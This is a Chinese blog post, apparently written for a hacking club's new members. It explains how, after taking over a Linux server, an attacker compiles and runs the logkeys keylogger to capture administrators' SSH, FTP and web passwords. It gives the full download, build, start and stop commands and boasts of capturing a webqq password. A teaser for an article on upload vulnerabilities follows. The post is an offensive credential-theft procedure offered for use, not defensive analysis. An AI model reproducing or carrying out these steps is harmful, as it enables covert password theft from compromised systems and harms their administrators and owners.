拿到Linux服务器的权限后,我们可以在机器上运行一个记录键盘的小工具,来记录管理员平时输入的一些密码。有时候用处很大,比如管理员登录ftp/ssh,我们就可能得到目标密码和很多管理员常用密码。
logkeys:https://code.google.com/p/logkeys/
下载下来源代码。
首先解压:
tar -vxzf logkeys-0.1.1a.tar.gz
进入解压后到build目录并运行父目录里的configure,配置编译选项:
cd logkeys-0.1.0/build ../configure
一开始我也在想,为何要进入build目录再运行父目录下的文件(Linux小白感觉多此一举),后来问了一下才知道,不想因为编译弄乱logkeys-0.1.0目录下的东西,所以进到build目录。
然后编译:
make install
make需要root权限。获取一下即可。
编译成功以后我们就可以使用了,先看看帮助:
很简单方便。一般用到三个参数:
-s 开始监听
-u 使用US键位进行替代默认键位。这个很重要,如果不加这个参数到话抓到的东西不对。
-o 输出文件
于是,我们先新建一个文件:
touch key.log
然后运行logkes即可:
logkeys -suo key.log
可以试试,登录一下webqq,果然记录下了密码:
需要停止时:
logkeys -k
kill掉即可。
这篇文章好几天前写了,给协会里新成员普及知识,看大家也都玩的差不多了,就发表到博客里,增加一点噱头和访问量,哈哈~ 0x01 什么是上传漏洞 很多cms为了丰富自己的功能都提供了上传头像、上传图片等功能。但如果上传的内容没有做好过滤,则等于说给了攻击者一个执行…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册